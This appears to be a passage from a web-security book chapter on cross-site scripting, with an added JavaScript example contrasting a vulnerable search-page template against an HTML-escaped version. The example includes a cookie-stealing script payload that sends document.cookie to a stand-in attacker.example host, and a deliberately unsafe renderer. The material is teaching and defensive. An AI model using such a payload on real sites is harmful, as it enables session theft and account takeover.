7 CROSS-SITE SCRIPTING ATTACKS
In the previous chapter, you saw how attackers can inject code into web servers to compromise websites. If your web server is secure, a hacker's next best injection target is the web browser. Browsers obediently execute any JavaScript code that appears in a web page, and they treat that code as part of the page it arrived in, so it runs with the same access to the page's contents, cookies, and network requests as the code you wrote yourself. If an attacker can find a way to inject malicious JavaScript into a user's browser while the user views your website, that user is in for a bad time. We call this type of code injection a cross-site scripting (XSS) attack.
JavaScript can read or modify any part of a web page, so there’s a lot an attacker can do with cross-site scripting vulnerabilities. ...
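The mechanism the two paragraphs above describe, as an added example that is not code from the book: a hypothetical server-side renderer for a search-results page builds HTML by splicing the user's query straight into the markup, so a query that contains a script element becomes script the browser executes. The hardened version is the same template with the query HTML-escaped before insertion. The template, the function names, the attacker query, and the `attacker.example` host are all constructed for this illustration.

```javascript
// Added example (not from the book): reflected XSS in a page template,
// and the escaping that prevents it.

// Escape the five characters that have meaning in HTML text and attribute
// contexts. '&' must be replaced first so the entities produced by the
// later replacements are not themselves re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical search-results page. The unsafe version concatenates the
// raw query into the markup, so any tags in it are parsed by the browser
// exactly as if the site's own developers had written them.
function renderSearchPageUnsafe(query) {
  return `<!doctype html><body><h1>Results for: ${query}</h1></body>`;
}

// Hardened version: identical template, but the query is escaped first,
// so the browser renders the attacker's text instead of executing it.
function renderSearchPageSafe(query) {
  return `<!doctype html><body><h1>Results for: ${escapeHtml(query)}</h1></body>`;
}

// Rough indicator used only for this demonstration: does the rendered page
// contain a script element that the template itself never emits? This is
// not a general XSS detector (event-handler attributes, javascript: URLs
// and other vectors would not match); it only checks this example's payload.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input. In a real attack the victim would be lured
// into opening a link whose query parameter carries this string; the script
// then runs inside the victim's session on the vulnerable site and ships
// the document's cookies to a host the attacker controls.
const attackerQuery =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

const unsafePage = renderSearchPageUnsafe(attackerQuery);
const safePage = renderSearchPageSafe(attackerQuery);

console.log("unsafe page contains a script element:", containsInjectedScript(unsafePage));
console.log("safe page contains a script element:  ", containsInjectedScript(safePage));
console.log(safePage);
```

The check in `containsInjectedScript` is deliberately narrow; the durable fix is the escaping in `renderSearchPageSafe`, applied at the point where untrusted data is inserted into HTML, not a filter that tries to recognise every form a payload could take.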